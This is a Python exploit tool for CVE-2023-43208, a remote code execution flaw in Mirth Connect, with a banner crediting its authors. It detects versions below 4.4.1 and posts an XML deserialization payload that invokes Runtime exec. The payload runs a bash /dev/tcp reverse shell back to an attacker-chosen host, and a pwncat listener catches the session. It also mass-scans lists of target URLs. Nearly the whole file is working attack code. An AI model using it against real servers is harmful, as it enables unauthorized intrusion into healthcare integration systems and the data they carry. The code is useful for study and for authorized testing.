import os import time import socket import argparse import requests import threading import pwncat.manager from packaging import version from rich.console import Console from alive_progress import alive_bar from concurrent.futures import ThreadPoolExecutor, as_completed requests.packages.urllib3.disable_warnings( requests.packages.urllib3.exceptions.InsecureRequestWarning ) class MirthConnectExploit: def __init__(self): self.console = Console() self.execution_process = "/api/users" self.grab_version = "/api/server/version" self.headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0", "X-Requested-With": "OpenAPI", "Content-Type": "application/xml", } self.output_file = None def custom_print(self, message: str, header: str) -> None: header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"} self.console.print( f"[bold {header_colors.get(header, 'white')}][{header}][/bold {header_colors.get(header, 'white')}] {message}" ) def ascii_art(self): art_texts = [ " ██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██ ██ ██████ ██████ ██████ █████", "██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██", "██ ██ ██ █████ █████ █████ ██ ██ ██ █████ █████ █████ ███████ █████ █████ ██ ██ ██ █████", "██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██", " ██████ ████ ███████ ███████ ██████ ███████ ██████ ██ ██████ ███████ ██████ █████", ] print() for text in art_texts: self.custom_print(f"[bold bright_green]{text}[/bold bright_green]", "*") print() self.custom_print( "Coded By: K3ysTr0K3R and Chocapikk ( NSA, we're still waiting :D )", "+" ) print() def start_listener(self, timeout=10) -> None: with socket.create_server(("0.0.0.0", int(self.rshell_port))) as listener: listener.settimeout(timeout) self.custom_print( f"Waiting for incoming connection on port {self.rshell_port}...", "*" ) try: victim, victim_addr = listener.accept() self.revshell_connected = True self.custom_print( f"Received connection from {victim_addr[0]}:{victim_addr[1]}", "+" ) with pwncat.manager.Manager() as manager: session = manager.create_session( platform="linux", protocol="socket", client=victim ) self.custom_print("Dropping to pwncat prompt...", "+") manager.interactive() except socket.timeout: self.custom_print( f"No reverse shell connection received within {timeout} seconds.", "-", ) def detect_mirth_connect(self, target): self.custom_print("Looking for Mirth Connect instance...", "*") try: response = requests.get(target, timeout=10, verify=False) if "Mirth Connect Administrator" in response.text: self.custom_print("Found Mirth Connect instance", "+") return True else: self.custom_print("Mirth Connect not found", "-") except requests.exceptions.RequestException as e: self.custom_print(f"Error while trying to connect to {target}: {e}", "-") return False def is_vulnerable_version(self, version_str): parsed_version = version.parse(version_str) if isinstance(parsed_version, version.Version): fixed_version = version.parse("4.4.1") if parsed_version < fixed_version: return version_str def detect_vuln(self, target): if self.detect_mirth_connect(target): try: response = requests.get( target + self.grab_version, headers=self.headers, timeout=10, verify=False, ) if response and self.is_vulnerable_version(response.text): self.custom_print( f"Vulnerable Mirth Connect version {response.text} instance found at {target}", "+", ) return True except requests.exceptions.RequestException as e: self.custom_print( f"Error fetching version information from {target}: {e}", "-" ) return False @staticmethod def build_xml_payload(command): command = command.replace("&", "&") command = command.replace("<", "<") command = command.replace(">", ">") command = command.replace('"', """) command = command.replace("'", "'") xml_data = f""" abcd java.lang.Comparable java.lang.Runtime getMethod java.lang.String [Ljava.lang.Class; getRuntime invoke java.lang.Object [Ljava.lang.Object; exec java.lang.String {command} transform compareTo """ return xml_data def exploit(self, target, lhost, lport): if self.detect_vuln(target): command = f"sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/{lhost}/{lport};sh <&53 >&53 2>&53'" self.custom_print(command, "!") xml_data = self.build_xml_payload(command) try: self.custom_print(f"Launching exploit against {target}...", "*") try: response = requests.post( target + self.execution_process, headers=self.headers, data=xml_data, timeout=20, verify=False, ) except requests.exceptions.RequestException as e: self.custom_print(f"Exploit failed for {target}: {e}", "-") except requests.exceptions.RequestException: self.custom_print(f"Exploit failed for {target}", "-") def shell_opened(self, target, lhost, lport, bindport=None, timeout=10): self.rshell_port = bindport if bindport is not None else lport self.custom_print( f"Setting up listener on {lhost}:{self.rshell_port} and launching exploit...", "*", ) listener_thread = threading.Thread(target=self.start_listener, args=(timeout,)) listener_thread.start() time.sleep(1) self.exploit(target, lhost, lport) listener_thread.join() def scanner(self, target): try: response = requests.get( target + self.grab_version, headers=self.headers, timeout=10, verify=False, ) vuln_version = self.is_vulnerable_version(response.text) if vuln_version: self.custom_print( f"Vulnerability Detected | [bold bright_yellow]{target:<60}[/bold bright_yellow] | Server Version: [bold cyan]{vuln_version:<15}[/bold cyan]", "+", ) if self.output_file: with open(self.output_file, "a") as file: file.write(target + "\n") except requests.exceptions.RequestException: pass def scan_from_file(self, target_file, threads): if not os.path.exists(target_file): self.custom_print(f"File not found: {target_file}", "-") return with open(target_file, "r") as url_file: urls = [url.strip() for url in url_file.readlines()] if not urls: return with alive_bar( len(urls), title="Scanning Targets", bar="smooth", enrich_print=False ) as bar: with ThreadPoolExecutor(max_workers=threads) as executor: futures = [executor.submit(self.scanner, url) for url in urls] for future in as_completed(futures): bar() def run(self): parser = argparse.ArgumentParser( description="A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)" ) parser.add_argument("-u", "--url", help="Target URL to exploit") parser.add_argument("-lh", "--lhost", help="Listening host") parser.add_argument("-lp", "--lport", help="Listening port") parser.add_argument( "-bp", "--bindport", type=int, help="Port for the bind listener (useful with ngrok)", ) parser.add_argument("-f", "--file", help="File containing target URLs to scan") parser.add_argument( "-o", "--output", help="Output file for saving scan results" ) parser.add_argument( "-t", "--threads", default=50, type=int, help="Number of threads to use for scanning", ) args = parser.parse_args() self.output_file = args.output match (args.url, args.lhost, args.lport, args.file): case (url, lhost, lport, None) if url and lhost and lport: self.shell_opened(url, lhost, lport, args.bindport) case (None, None, None, file) if file: self.scan_from_file(file, args.threads) case _: parser.print_help() if __name__ == "__main__": exploit_tool = MirthConnectExploit() exploit_tool.ascii_art() exploit_tool.run()